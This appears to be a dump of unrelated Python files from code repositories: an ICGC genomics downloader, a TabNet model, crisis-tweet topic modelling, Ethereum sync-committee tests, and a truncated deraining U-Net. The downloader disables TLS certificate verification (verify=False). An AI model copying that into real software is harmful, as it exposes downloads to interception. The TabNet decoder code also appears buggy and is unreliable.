from pathlib import Path
import requests
from tqdm import tqdm
def get_filesize(pql_query: str,
datatype: str = "ssm") -> int:
"""
Calls an ICGC Data Portal API to retrieve the file size of the dataset
specified by a PQL query and a data type.
:param pql_query: PQL query to retrieve the dataset of interest.
:param datatype: data types e.g., "ssm" for simple somatic mutation,
"donor" for clinical dataset, "cnsm" for copy number somatic mutation,
etc.
:return: size of the specified dataset in bytes.
"""
url = f"https://dcc.icgc.org/api/v1/download/sizePQL?pql={pql_query}"
response = requests.get(url)
if response.status_code != 200:
raise IOError(f"GET {url} resulted in status code {response.status_code}")
file_sizes = response.json()["fileSize"]
for dataset in file_sizes:
if dataset["label"] == datatype:
return dataset["sizes"]
raise ValueError(f"GET {url} does not contain the {datatype} data type.")
def get_download_id(pql_query: str,
datatype: str = "ssm",
output_format: str = "TSV") -> str:
"""
Calls an ICGC Data Portal API to retrieve a download ID for the dataset
specified by a PQL query, a data type, and an output format.
:param pql_query: PQL query to retrieve the dataset of interest.
:param datatype: data types e.g., "ssm" for simple somatic mutation,
"donor" for clinical dataset, "cnsm" for copy number somatic mutation,
etc.
:param output_format: output data format. Supported formats: ["json", "TSV"].
:return: a download ID
"""
info = f"[{{\"key\":\"{datatype}\", \"value\":\"{output_format}\"}}]"
url = f"https://dcc.icgc.org/api/v1/download/submitPQL?pql={pql_query}&info={info}"
response = requests.get(url)
if response.status_code != 200:
raise IOError(f"GET {url} resulted in status code {response.status_code}")
return response.json()["downloadId"]
def download_data(output_filepath: Path,
download_id: str,
file_size: int) -> None:
"""
Calls an ICGC Data Portal API to download a gzipped file for the dataset
specified by a download ID.
:param output_filepath: output file directory
:param download_id: download ID obtained from API call from get_download_id()
:param file_size: dataset file size in bytes
"""
url = f"https://dcc.icgc.org/api/v1/download/{download_id}"
headers = {"Accept": "application/x-gzip"}
progress_bar = tqdm(total=file_size, unit="iB", unit_scale=True)
response = requests.get(url, headers=headers,
verify=False, stream=True)
if response.status_code != 200:
raise IOError(f"GET {url} resulted in status code {response.status_code}")
with open(output_filepath.with_suffix(".tsv.gz"), "wb") as f:
for data in response.iter_content(1024 ** 2):
progress_bar.update(len(data))
f.write(data)
progress_bar.close()
def download_icgc_datasets(output_dir: Path,
projects: list[str],
datatype: str = "ssm",
analysis_type: str = "WGS",
output_format: str = "TSV") -> None:
"""
Download BRCA project datasets from ICGC Data Portal.
:param output_dir: output directory to download data in.
:param projects: a list of projects in ICGC to extract data from.
:param datatype: data types e.g., "ssm" for simple somatic mutation,
"donor" for clinical dataset, "cnsm" for copy number somatic mutation,
etc.
:param analysis_type: data analysis type. E.g., WGS for whole genome sequencing,
WXS for whole exome sequencing, etc.
:param output_format: output data format. Supported formats: ["json", "TSV"].
"""
supported_formats = ["TSV", "json"]
if output_format not in supported_formats:
raise ValueError(f"Output format {output_format} isn't supported. "
f"Supported formats: {supported_formats}")
if not output_dir.exists():
output_dir.mkdir()
for project in projects:
pql_query = f"select(*),in(donor.projectId,'{project}')," \
f"in(donor.availableDataTypes,'{datatype}')," \
f"in(donor.analysisTypes,'{analysis_type}')"
file_size = get_filesize(pql_query, datatype)
print(f"Downloading {datatype} data ({(file_size / 1024 ** 2):.2f} MBs) "
f"from project {project}.")
download_id = get_download_id(pql_query, datatype, output_format)
output_filepath = output_dir / f"{project}_{datatype}_{analysis_type}"
download_data(output_filepath, download_id, file_size)
print("Done.")
```
|
{
"source": "jeyabbalas/tabnet",
"score": 3
}
|
#### File: tabnet/tf_tabnet/tabnet_model.py
```python
from typing import Dict, List, Tuple, Optional, Union
import tensorflow as tf
import tensorflow_addons as tfa
from utils import entmax15
class GLULayer(tf.keras.layers.Layer):
def __init__(
self,
units: int = 16,
fc_layer: Optional[tf.keras.layers.Dense] = None,
virtual_batch_size: Optional[int] = None,
momentum: float = 0.98,
**kwargs
):
"""
Creates a layer with a fully-connected linear layer, followed by batch
normalization, and a gated linear unit (GLU) as the activation function.
Parameters:
-----------
units: int
Number of units in layer. Default (16).
fc_layer:tf.keras.layers.Dense
This is useful when you want to create a GLU layer with shared parameters. This
is necessary because batch normalization should still be uniquely initialized
due to the masked inputs in TabNet steps being in a different scale than the
original input. Default (None) creates a new FC layer.
virtual_batch_size: int
Batch size for Ghost Batch Normalization (GBN). Value should be much smaller
than and a factor of the overall batch size. Default (None) runs regular batch
normalization. If an integer value is specified, GBN is run with that virtual
batch size.
momentum: float
Momentum for exponential moving average in batch normalization. Lower values
correspond to larger impact of batch on the rolling statistics computed in
each batch. Valid values range from 0.0 to 1.0. Default (0.98).
"""
super(GLULayer, self).__init__(**kwargs)
self.units = units
self.virtual_batch_size = virtual_batch_size
self.momentum = momentum
if fc_layer:
self.fc = fc_layer
else:
self.fc = tf.keras.layers.Dense(self.units*2, use_bias=False)
self.bn = tf.keras.layers.BatchNormalization(virtual_batch_size=self.virtual_batch_size,
momentum=self.momentum)
def call(self, inputs: tf.Tensor, training: Optional[bool] = None) -> tf.Tensor:
x = self.fc(inputs)
x = self.bn(x, training=training)
x = tf.math.multiply(x[:, :self.units], tf.nn.sigmoid(x[:, self.units:]))
return x
class FeatureTransformer(tf.keras.layers.Layer):
def __init__(
self,
n_dependent_glus: int = 2,
shared_glu_fc_layers: Optional[List[tf.keras.layers.Dense]] = None,
units: int = 16,
virtual_batch_size: Optional[int] = None,
momentum: float = 0.98,
**kwargs
):
"""
Creates a feature transformer for non-linear processing of features.
Parameters:
-----------
n_dependent_glus: int
Number of step-dependent GLU layers within the Feature Transformer. Increasing
the number of step-dependent layers is an effective strategy to improve predictive
performance. Default (2).
shared_glu_fc_layers: List[tf.keras.layers.Dense]
A list of dense layers to construct shared GLU layers. Default (None) creates only
n_dependent_glus dependent GLU layers and no shared layers. Total number of GLU layers
in this feature transformer is len(shared_glu_layers) + n_dependent_glus.
units: int
Number of units in each GLU layer. Default (16).
virtual_batch_size: int
Batch size for Ghost Batch Normalization (GBN). Value should be much smaller
than and a factor of the overall batch size. Default (None) runs regular batch
normalization. If an integer value is specified, GBN is run with that virtual
batch size.
momentum: float
Momentum for exponential moving average in batch normalization. Lower values
correspond to larger impact of batch on the rolling statistics computed in
each batch. Valid values range from 0.0 to 1.0. Default (0.98).
"""
super(FeatureTransformer, self).__init__(**kwargs)
n_glu_layers = (len(shared_glu_fc_layers) if shared_glu_fc_layers else 0) + n_dependent_glus
if n_glu_layers <= 0:
raise ValueError("Invalid Argument: Total number of GLU layers in the feature transformer"
" should be greater than 0.")
self.units = units
self.norm_factor = tf.math.sqrt(tf.constant(0.5))
self.glu_layers = list()
for i in range(n_glu_layers):
fc_layer = None
if shared_glu_fc_layers:
if i < len(shared_glu_fc_layers):
fc_layer = shared_glu_fc_layers[i]
glu_layer = GLULayer(
units=self.units,
fc_layer=fc_layer,
virtual_batch_size=virtual_batch_size,
momentum=momentum,
)
self.glu_layers.append(glu_layer)
def build(self, input_shape: tf.TensorShape):
if input_shape[-1] != self.units:
self.omit_first_residual = True
else:
self.omit_first_residual = False
def call(self, inputs: tf.Tensor, training: Optional[bool] = None) -> tf.Tensor:
for i, glu_layer in enumerate(self.glu_layers):
x = glu_layer(inputs, training=training)
if self.omit_first_residual and (i==0):
inputs = x
else:
x = tf.math.multiply(self.norm_factor, tf.math.add(inputs, x))
inputs = x
return x
class Split(tf.keras.layers.Layer):
def __init__(
self,
split_dim: int = 8,
**kwargs
):
"""
Splits the input tensor into two at a specified column dimension.
Parameters:
-----------
split_dim: int
Column dimension where the input tensor should be split into two. Default (8).
"""
super(Split, self).__init__(**kwargs)
self.split_dim = split_dim
def call(self, inputs: tf.Tensor) -> Tuple[tf.Tensor]:
return inputs[:, :self.split_dim], inputs[:, self.split_dim:]
class AttentiveTransformer(tf.keras.layers.Layer):
def __init__(
self,
units: int,
n_steps: int = 3,
epsilon: float = 1e-15,
lambda_sparse: float = 1e-3,
virtual_batch_size: Optional[int] = None,
momentum: float = 0.98,
mask_type: str = "sparsemax",
**kwargs
):
"""
Creates an attentive transformer that learns masks to select salient features
for further analysis. This layer propagates the sparsity regularization loss
to the Keras model/layer that calls this layer.
Parameters:
-----------
units: int
Number of units in layer. This layer outputs a mask for your data, so the
number of units should be the same as your data dimension.
n_steps: int
Number of sequential attention steps. Typically ranges from 3 to 10. If the
data has more informative features, the number of steps is higher. Large
values may lead to overfitting. Default (3).
epsilon: float
Prevent computing log(0) by adding a small constant log(0+epsilon). Default (1e-15).
lambda_sparse: float
Coefficient for the mask sparsity loss. Important parameter to tune. Lower values
lead to better performance. Default (1e-3).
virtual_batch_size: int
Batch size for Ghost Batch Normalization (GBN). Value should be much smaller
than and a factor of the overall batch size. Default (None) runs regular batch
normalization. If an integer value is specified, GBN is run with that virtual
batch size.
momentum: float
Momentum for exponential moving average in batch normalization. Lower values
correspond to larger impact of batch on the rolling statistics computed in
each batch. Valid values range from 0.0 to 1.0. Default (0.98).
mask_type: str
mask_type ∈ {"softmax", "entmax", "sparsemax"}. Softmax generates a dense mask.
Entmax (i.e. entmax 1.5) generates a slightly sparser mask. Default(sparsemax)
generates a highly sparse mask.
To learn more, refer: https://arxiv.org/abs/1905.05702.
"""
super(AttentiveTransformer, self).__init__(**kwargs)
# for computing sparsity regularization loss
self.n_steps = n_steps
self.epsilon = epsilon
self.lambda_sparse = lambda_sparse
# attentive transformer layers
self.fc = tf.keras.layers.Dense(units, use_bias=False)
self.bn = tf.keras.layers.BatchNormalization(virtual_batch_size=virtual_batch_size,
momentum=momentum)
if mask_type == "sparsemax":
self.sparse_activation = tfa.activations.sparsemax
elif mask_type == "entmax":
self.sparse_activation = entmax15
elif mask_type == "softmax":
self.sparse_activation = tf.nn.softmax
else:
raise NotImplementedError(
"Available options for mask_type: {'sparsemax', 'entmax', 'softmax'}"
)
def call(self, inputs: tf.Tensor, prior: tf.Tensor, training: Optional[bool] = None) -> tf.Tensor:
x = self.fc(inputs)
x = self.bn(x, training=training)
x = tf.multiply(prior, x)
x = self.sparse_activation(x, axis=-1)
# propagate sparsity loss from current mask
sparsity_reg_loss = tf.reduce_mean(
tf.reduce_sum(
tf.multiply(-x, tf.math.log(x+self.epsilon)),
axis=-1
)
)
sparsity_reg_loss /= self.n_steps
self.add_loss(self.lambda_sparse*sparsity_reg_loss)
return x
class TabNetEncoder(tf.keras.layers.Layer):
def __init__(
self,
decision_dim: int = 8,
attention_dim: int = 8,
n_steps: int = 3,
n_shared_glus: int = 2,
n_dependent_glus: int = 2,
relaxation_factor: float = 1.3,
epsilon: float = 1e-15,
virtual_batch_size: Optional[int] = None,
momentum: float = 0.98,
mask_type: str = "sparsemax",
lambda_sparse: float = 1e-3,
**kwargs
):
"""
Creates a TabNet encoder network.
Parameters:
-----------
decision_dim: int
Dimension of the decision layer. Typically ranges from 8 to 128. Assuming
decision_dim to be equal to attention_dim is sensible. Large values may lead
to overfitting. Default (8).
attention_dim: int
Dimension of the attention layer. Typically ranges from 8 to 128. Assuming
attention_dim to be equal to decision_dim is sensible. Large values may lead
to overfitting. Default (8).
n_steps: int
Number of sequential attention steps. Typically ranges from 3 to 10. If the
data has more informative features, the number of steps is higher. Large
values may lead to overfitting. Default (3).
n_shared_glus: int
Number of shared GLU layers within the Feature Transformer. Increasing the
number of shared layers is an effective strategy to improve predictive performance
without a significant increase in the number of parameters. Default (2).
n_dependent_glus: int
Number of step-dependent GLU layers within the Feature Transformer. Increasing
the number of step-dependent layers is an effective strategy to improve predictive
performance. Default (2).
relaxation_factor: float
Relaxation parameter used to compute the prior in the Attentive Transformer
layers. Typically ranges from 1.0 to 2.0. This is an important hyperparameter
to tune in TabNets. Default (1.3).
epsilon: float
Prevent computing log(0) by adding a small constant log(0+epsilon). Default (1e-15).
virtual_batch_size: int
Batch size for Ghost Batch Normalization (GBN). Value should be much smaller
than and a factor of the overall batch size. Default (None) runs regular batch
normalization. If an integer value is specified, GBN is run with that virtual
batch size.
momentum: float
Momentum for exponential moving average in batch normalization. Lower values
correspond to larger impact of batch on the rolling statistics computed in
each batch. Valid values range from 0.0 to 1.0. Default (0.98).
mask_type: str
mask_type ∈ {"softmax", "entmax", "sparsemax"}. Softmax generates a dense mask.
Entmax (i.e. entmax 1.5) generates a slightly sparser mask. Default(sparsemax)
generates a highly sparse mask.
To learn more, refer: https://arxiv.org/abs/1905.05702.
lambda_sparse: float
Coefficient for the mask sparsity loss. Important parameter to tune. Lower values
lead to better performance. Default (1e-3).
"""
super(TabNetEncoder, self).__init__(**kwargs)
self.decision_dim = decision_dim
self.n_steps = n_steps
self.n_dependent_glus = n_dependent_glus
self.relaxation_factor = relaxation_factor
self.epsilon = epsilon
self.virtual_batch_size = virtual_batch_size
self.momentum = momentum
self.mask_type = mask_type
self.lambda_sparse = lambda_sparse
# plain batch normalization
self.initial_bn = tf.keras.layers.BatchNormalization(momentum=self.momentum)
# shared glu layers
self.glu_dim = decision_dim + attention_dim
self.shared_glu_fc_layers = list()
for _ in range(n_shared_glus):
self.shared_glu_fc_layers.append(tf.keras.layers.Dense(units=self.glu_dim*2, use_bias=False))
# initial feature transformer
self.initial_feature_transformer = FeatureTransformer(
n_dependent_glus=self.n_dependent_glus,
shared_glu_fc_layers=self.shared_glu_fc_layers,
units=self.glu_dim,
virtual_batch_size=self.virtual_batch_size,
momentum=self.momentum,
name="FeatureTransformer_Step_0",
)
# split layer
self.split_layer = Split(split_dim=decision_dim)
def build(self, input_shape: tf.TensorShape):
feature_dim = input_shape[-1]
# feature and attentive transformers for each step
self.step_feature_transformers = list()
self.step_attentive_transformers = list()
for step in range(self.n_steps):
feature_transformer = FeatureTransformer(
n_dependent_glus=self.n_dependent_glus,
shared_glu_fc_layers=self.shared_glu_fc_layers,
units=self.glu_dim,
virtual_batch_size=self.virtual_batch_size,
momentum=self.momentum,
name=f"FeatureTransformer_Step_{(step+1)}",
)
attentive_transformer = AttentiveTransformer(
units=feature_dim,
n_steps=self.n_steps,
epsilon=self.epsilon,
lambda_sparse=self.lambda_sparse,
virtual_batch_size=self.virtual_batch_size,
momentum=self.momentum,
mask_type = self.mask_type,
name=f"AttentiveTransformer_Step_{(step+1)}",
)
self.step_feature_transformers.append(
feature_transformer
)
self.step_attentive_transformers.append(
attentive_transformer
)
def call(self, inputs: tf.Tensor, prior: Optional[tf.Tensor] = None,
training: Optional[bool] = None) -> tf.Tensor:
batch_size = tf.shape(inputs)[0]
step_output_aggregate = tf.zeros((batch_size, self.decision_dim))
if prior is None:
prior = tf.ones_like(inputs)
x = self.initial_bn(inputs, training=training)
x_proc = self.initial_feature_transformer(x, training=training)
_, x_a = self.split_layer(x_proc)
for step in range(self.n_steps):
# step operations
mask = self.step_attentive_transformers[step](x_a,
prior=prior,
training=training)
masked_x = tf.multiply(mask, x)
x_proc = self.step_feature_transformers[step](masked_x,
training=training)
x_d, x_a = self.split_layer(x_proc)
step_output = tf.keras.activations.relu(x_d)
# for prediction
step_output_aggregate += step_output
# update prior
prior = tf.multiply(self.relaxation_factor - mask, prior)
return step_output_aggregate
def calculate_feature_attribution(self, inputs: tf.Tensor) -> Tuple[tf.Tensor, Dict[int, tf.Tensor]]:
feature_attribution = tf.zeros_like(inputs)
masks = dict()
prior = tf.ones_like(inputs)
x = self.initial_bn(inputs, training=False)
x_proc = self.initial_feature_transformer(x, training=False)
_, x_a = self.split_layer(x_proc)
for step in range(self.n_steps):
# step operations
mask = self.step_attentive_transformers[step](x_a,
prior=prior,
training=False)
masked_x = tf.multiply(mask, x)
x_proc = self.step_feature_transformers[step](masked_x,
training=False)
x_d, x_a = self.split_layer(x_proc)
step_output = tf.keras.activations.relu(x_d)
# for interpretation
masks[step] = mask
step_coefficient = tf.reshape(
tf.math.reduce_sum(step_output, axis=-1),
shape=(-1,1)
)
feature_attribution += tf.multiply(step_coefficient, mask)
# update prior
prior = tf.multiply(self.relaxation_factor - mask, prior)
# normalization
feature_attribution /= tf.reshape(
tf.reduce_sum(feature_attribution, axis=-1),
shape=(-1,1)
)
return feature_attribution, masks
class TabNetDecoder(tf.keras.layers.Layer):
def __init__(
self,
reconstruction_dim: int,
n_steps: int = 3,
n_shared_glus: int = 1,
n_dependent_glus: int = 1,
virtual_batch_size: Optional[int] = None,
momentum: float = 0.98,
**kwargs
):
"""
Creates a TabNet decoder network.
Parameters
-----------
reconstruction_dim: int
Dimension of the decoder network's output layer.
n_steps: int
Number of sequential attention steps. Typically ranges from 3 to 10. If the
data has more informative features, the number of steps is higher. Large
values may lead to overfitting. Default (3).
n_shared_glus: int
Number of shared GLU layers within the Feature Transformer. Increasing the
number of shared layers is an effective strategy to improve predictive performance
without a significant increase in the number of parameters. Default (2).
n_dependent_glus: int
Number of step-dependent GLU layers within the Feature Transformer. Increasing
the number of step-dependent layers is an effective strategy to improve predictive
performance. Default (2).
virtual_batch_size: int
Batch size for Ghost Batch Normalization (GBN). Value should be much smaller
than and a factor of the overall batch size. Default (None) runs regular batch
normalization. If an integer value is specified, GBN is run with that virtual
batch size.
momentum: float
Momentum for exponential moving average in batch normalization. Lower values
correspond to larger impact of batch on the rolling statistics computed in
each batch. Valid values range from 0.0 to 1.0. Default (0.98).
"""
super(TabNetDecoder, self).__init__(**kwargs)
self.reconstruction_dim = reconstruction_dim
self.n_steps = n_steps
self.n_shared_glus = n_shared_glus
self.n_dependent_glus = n_dependent_glus
self.virtual_batch_size = virtual_batch_size
self.momentum = momentum
def build(self, input_shape: tf.TensorShape):
latent_dim = input_shape[-1]
# shared glu layers
self.shared_glu_fc_layers = list()
for _ in range(self.n_shared_glus):
self.shared_glu_fc_layers.append(tf.keras.layers.Dense(units=latent_dim*2, use_bias=False))
# feature and attentive transformers for each step
self.step_feature_transformers = list()
self.step_fc_layers = list()
for step in range(self.n_steps):
feature_transformer = FeatureTransformer(
n_dependent_glus=self.n_dependent_glus,
shared_glu_fc_layers=self.shared_glu_fc_layers,
units=latent_dim,
virtual_batch_size=self.virtual_batch_size,
momentum=self.momentum,
name=f"FeatureTransformer_Decoder_Step_{(step+1)}",
)
fc_layer = tf.keras.layers.Dense(
units=self.reconstruction_dim,
use_bias=False,
name=f"FC_Decoder_Step_{(step+1)}",
)
self.step_feature_transformers.append(
feature_transformer
)
self.step_fc_layers.append(
fc_layer
)
def call(self, inputs: tf.Tensor) -> tf.Tensor:
batch_dim = tf.shape(inputs)[-1]
reconstructed_features = tf.zeros((batch_dim, self.reconstruction_dim))
for step in range(self.n_steps):
# step operation
x = self.step_feature_transformers[step](inputs,
training=False)
x = self.step_fc_layers[step](inputs)
reconstructed_features += x
return reconstructed_features
class TabularEmbedding(tf.keras.layers.Layer):
def __init__(
self,
feature_names: List[str],
categorical_str_indices: List[int],
categorical_dims: List[int],
categorical_embed_dims: Union[int, List[int]],
**kwargs
):
"""
Creates an embedding layer for categorical variables. Numerical variables are
untouched.
Parameters
-----------
feature_names: List[str]
A list of feature names in order that they are expected to be input into the
"""
super(TabularEmbedding, self).__init__(**kwargs)
```
|
{
"source": "jeyadosstimothy/ML-on-CrisisLex",
"score": 3
}
|
#### File: jeyadosstimothy/ML-on-CrisisLex/topicModelling.py
```python
import utils, constants
import sys, pickle, argparse
from gensim import corpora
from gensim.models.ldamodel import LdaModel
from gensim.models.lsimodel import LsiModel
def parseArgs():
parser = argparse.ArgumentParser()
parser.add_argument('-r', '--reprocessDataset', action='store_true',
help='Must be specified when running the program for the first time '+
'(when preprocessed dataset is not available). '+
'If specified, reads and processes the dataset again. '+
'Else reads an already processed dataset from ' + constants.CLASSIFICATION_DATA_PATH)
return parser.parse_args(sys.argv[1:])
def printTopics(model):
predicted_topics = model.print_topics(num_topics=5, num_words=5)
for i, topics in predicted_topics:
print('Words in Topic {}:\n {}'.format(i+1, topics))
if __name__ == '__main__':
arguments = parseArgs()
dataset = utils.loadDataset(arguments.reprocessDataset, classification=False, splitWords=True)
# Creating dictionary from dataset, where each unique term is assigned an index
dictionary = corpora.Dictionary(dataset)
# Converting list of documents into Bag of Words using dictionary
doc_term_matrix = [dictionary.doc2bow(doc) for doc in dataset]
# Training models on the document term matrix
modelList = [ LdaModel(doc_term_matrix, num_topics=10, id2word=dictionary, passes=2),
LsiModel(doc_term_matrix, num_topics=10, id2word=dictionary)
]
for model in modelList:
print('Topic Modelling using %s' % utils.getClassName(model))
printTopics(model)
utils.saveModel(model)
```
#### File: jeyadosstimothy/ML-on-CrisisLex/utils.py
```python
import pandas, os, re, string, nltk, langid, itertools, pickle
import constants
LANGID_EN = 'en'
NLTK_EN = 'english'
NLTK_WORDNET = 'wordnet'
NLTK_STOPWORDS = 'stopwords'
nltk.download(NLTK_WORDNET)
nltk.download(NLTK_STOPWORDS)
from nltk.corpus import stopwords
from nltk.stem.wordnet import WordNetLemmatizer
from nltk.stem.snowball import SnowballStemmer
stopwordsSet = set(stopwords.words(NLTK_EN))
punctuations = string.punctuation
lemmatizer = WordNetLemmatizer()
stemmer = SnowballStemmer(NLTK_EN)
def cleanTweets(data, splitWords=False):
def clean(text):
lower = text.lower()
usersRemoved = re.sub(r'(rt )?@[^ \t]*:?', '', lower)
urlRemoved = re.sub(r'http[^ \t]*', ' ', usersRemoved)
specialRemoved = re.sub(r'[“”–—…😩😢🙏❤😐😕😔☔😱😥💔😨【】’]', '', urlRemoved)
numbersRemoved = re.sub(r'[^ \t]*[0-9]+[^ \t]*', '', specialRemoved)
x = re.sub(r'&', '', numbersRemoved)
puncRemoved = x.translate(str.maketrans(punctuations, ' '*len(punctuations)))
singleSpace = re.sub(r'[ \t]+', ' ', puncRemoved)
stopwordsRemoved = tuple(i for i in singleSpace.strip().split() if i not in stopwordsSet and len(i)>3)
lemmatized = tuple(lemmatizer.lemmatize(word) for word in stopwordsRemoved)
stemmed = tuple(stemmer.stem(word) for word in lemmatized)
results = lemmatized
if splitWords:
return results
else:
return ' '.join(results)
if type(data) is str:
return clean(data)
elif type(data) is pandas.DataFrame:
data[constants.TWEET_COLUMN] = data[constants.TWEET_COLUMN].apply(clean)
return data
def removeUnrelatedTweets(df):
# Removes tweets that are marked 'Not Related' or 'Not Applicable'
df = df[df[constants.LABEL_COLUMN]!= constants.NOT_RELATED]
df = df[df[constants.LABEL_COLUMN]!= constants.NOT_APPLICABLE]
return df
def keepEnglishTweets(df):
# Removes tweets that are not in english
return df[df[constants.TWEET_COLUMN].map(lambda x: langid.classify(x)[0] == LANGID_EN)]
def getDatasetCsvPaths(path):
# gets all the CSV files of the CrisisLexT26 Dataset
csvPaths = []
for root, dirs, files in os.walk(path):
for file in files:
if re.match(constants.TWEET_DATA_CSV_REGEX, file):
csvPaths.append(os.path.join(root, file))
return csvPaths
def getDisasterNameFromPath(path):
# extracts the disaster name from the folder name in the given path
return re.match(constants.DISASTER_NAME_REGEX, path).group(1)
def setDisasterName(df, name):
# Sets 'Not Related' and 'Not Applicable' to 'off-topic' and sets remaining rows to disaster name
df.loc[df[constants.LABEL_COLUMN] == constants.NOT_RELATED, constants.LABEL_COLUMN] = constants.OFF_TOPIC_LABEL
df.loc[df[constants.LABEL_COLUMN] == constants.NOT_APPLICABLE, constants.LABEL_COLUMN] = constants.OFF_TOPIC_LABEL
df.loc[df[constants.LABEL_COLUMN] != constants.OFF_TOPIC_LABEL, constants.LABEL_COLUMN] = name
return df
def createClassificationDf(dfList, splitWords):
# Returns Dataframe that is the combination of all 26 disasters
# Marks tweets with disaster name, drops duplicate tweets, removes non-english tweets and cleans the remaining ones
for i in range(len(dfList)):
disasterName = getDisasterNameFromPath(dfList[i]['path'])
dfList[i]['df'] = setDisasterName(dfList[i]['df'], disasterName)
df = pandas.concat(i['df'] for i in dfList)
df = df.drop_duplicates(constants.TWEET_COLUMN)
df = keepEnglishTweets(df)
df = cleanTweets(df, splitWords)
return df
def createDocumentCorpus(dfList, splitWords):
# Creates a list of documents, each document containing all the words in the tweets related to the corresponding disaster
dfList = list(i['df'] for i in dfList)
documentList = []
for i in range(len(dfList)):
dfList[i] = removeUnrelatedTweets(dfList[i])
dfList[i] = dfList[i].drop_duplicates(constants.TWEET_COLUMN)
dfList[i] = keepEnglishTweets(dfList[i])
dfList[i] = cleanTweets(dfList[i], splitWords)
document = tuple(itertools.chain.from_iterable(dfList[i][constants.TWEET_COLUMN]))
documentList.append(document)
return documentList
def readDataset(path, classification, splitWords):
csvPaths = getDatasetCsvPaths(path)
dfList = [{'path': path, 'df': pandas.read_csv(path)} for path in csvPaths]
if classification:
return createClassificationDf(dfList, splitWords)
else:
return createDocumentCorpus(dfList, splitWords)
def getClassName(obj):
return obj.__class__.__name__
def saveModel(trainedModel, filePrefix=''):
# saves the trained model to pickle file
filename = filePrefix + getClassName(trainedModel) + '.pickle'
createDirectoryIfNotExists(constants.MODELS_PATH)
path = os.path.join(constants.MODELS_PATH, filename)
print('Saving model to %s' % path)
pickle.dump(trainedModel, open(path, 'wb'))
def loadDataset(reprocessDataset=False, classification=True, splitWords=False):
# reads dataset, processes it and stores it for future use if reprocessDataset is True
# else loads the preprocessed dataset and returns it
createDirectoryIfNotExists(constants.RESOURCES_PATH)
processedDataPath = constants.CLASSIFICATION_DATA_PATH if classification else constants.TOPIC_MODEL_DATA_PATH
if reprocessDataset:
print('Reading and Processing Dataset from %s' % constants.DATASET_PATH)
dataset = readDataset(constants.DATASET_PATH, classification, splitWords)
print('Storing Processed Dataset to %s' % processedDataPath)
pickle.dump(dataset, open(processedDataPath, 'wb'))
else:
print('Reading Preprocessed Dataset from %s' % processedDataPath)
dataset = pickle.load(open(processedDataPath, 'rb'))
return dataset
def createDirectoryIfNotExists(path):
# Returns True if directory did not exist and was created. Else returns False
if not os.path.exists(path):
os.makedirs(path)
return True
return False
```
|
{
"source": "jeyakatsa/consensus-specs",
"score": 2
}
|
#### File: unittests/networking/test_networking.py
```python
from eth2spec.test.context import (
with_altair_and_later,
spec_state_test,
)
from eth2spec.test.helpers.state import (
transition_to,
)
@with_altair_and_later
@spec_state_test
def test_get_sync_subcommittee_pubkeys_current_sync_committee(state, spec):
# Transition to the head of the next period
transition_to(spec, state, spec.SLOTS_PER_EPOCH * spec.EPOCHS_PER_SYNC_COMMITTEE_PERIOD)
next_slot_epoch = spec.compute_epoch_at_slot(state.slot + 1)
assert (
spec.compute_sync_committee_period(spec.get_current_epoch(state))
== spec.compute_sync_committee_period(next_slot_epoch)
)
sync_committee = state.current_sync_committee
sync_subcommittee_size = spec.SYNC_COMMITTEE_SIZE // spec.SYNC_COMMITTEE_SUBNET_COUNT
subcommittee_index = 1
i = subcommittee_index * sync_subcommittee_size
expect = sync_committee.pubkeys[i:i + sync_subcommittee_size]
assert spec.get_sync_subcommittee_pubkeys(state, subcommittee_index) == expect
@with_altair_and_later
@spec_state_test
def test_get_sync_subcommittee_pubkeys_next_sync_committee(state, spec):
# Transition to the end of the current period
transition_to(spec, state, spec.SLOTS_PER_EPOCH * spec.EPOCHS_PER_SYNC_COMMITTEE_PERIOD - 1)
next_slot_epoch = spec.compute_epoch_at_slot(state.slot + 1)
assert (
spec.compute_sync_committee_period(spec.get_current_epoch(state))
!= spec.compute_sync_committee_period(next_slot_epoch)
)
sync_committee = state.next_sync_committee
sync_subcommittee_size = spec.SYNC_COMMITTEE_SIZE // spec.SYNC_COMMITTEE_SUBNET_COUNT
subcommittee_index = 1
i = subcommittee_index * sync_subcommittee_size
expect = sync_committee.pubkeys[i:i + sync_subcommittee_size]
assert spec.get_sync_subcommittee_pubkeys(state, subcommittee_index) == expect
```
|
{
"source": "jeya-maria-jose/Derain_OUCD_Net",
"score": 2
}
|
#### File: jeya-maria-jose/Derain_OUCD_Net/derain_mulcmp.py
```python
import torch
import torch.backends.cudnn as cudnn
import torch.nn as nn
import torch.nn.functional as F
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.utils.model_zoo as model_zoo
from collections import OrderedDict
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.utils.model_zoo as model_zoo
from collections import OrderedDict
import torchvision.models as models
from torch.autograd import Variable
class unet(nn.Module):
def __init__(self):
super(unet, self).__init__()
self.encoder1 = nn.Conv2d(3, 32, 3, stride=1, padding=1) # b, 16, 10, 10
self.encoder2= nn.Conv2d(32, 64, 3, stride=1, padding=1) # b, 8, 3, 3
self.encoder3= nn.Conv2d(64, 128, 3, stride=1, padding=1)
self.encoder4= nn.Conv2d(128, 256, 3, stride=1, padding=1)
self.encoder5= nn.Conv2d(256, 512, 3, stride=1, padding=1)
self.decoder1 = nn.Conv2d(512, 256, 3, stride=1,padding=1) # b, 16, 5, 5
self.decoder2 = nn.Conv2d(256, 128, 3, stride=1, padding=1) # b, 8, 15, 1
self.decoder3 = nn.Conv2d(128, 64, 3, stride=1, padding=1) # b, 1, 28, 28
self.decoder4 = nn.Conv2d(64, 32, 3, stride=1, padding=1)
self.decoder5 = nn.Conv2d(32, 3, 3, stride=1, padding=1)
self.tan = nn.Tanh()
# self.soft = nn.Softmax(dim =1)
def forward(self, x):
out = F.relu(F.max_pool2d(self.encoder1(x),2,2))
t1 = out
out = F.relu(F.max_pool2d(self.encoder2(out),2,2))
t2 = out
out = F.relu(F.max_pool2d(self.encoder3(out),2,2))
t3 = out
out = F.relu(F.max_pool2d(self.encoder4(out),2,2))
t4 = out
out = F.relu(F.max_pool2d(self.encoder5(out),2,2))
# t2 = out
out = F.relu(F.interpolate(self.decoder1(out),scale_factor=(2,2),mode ='bilinear'))
# print(out.shape,t4.shape)
out = torch.add(out,t4)
out = F.relu(F.interpolate(self.decoder2(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,t3)
out = F.relu(F.interpolate(self.decoder3(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,t2)
out = F.relu(F.interpolate(self.decoder4(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,t1)
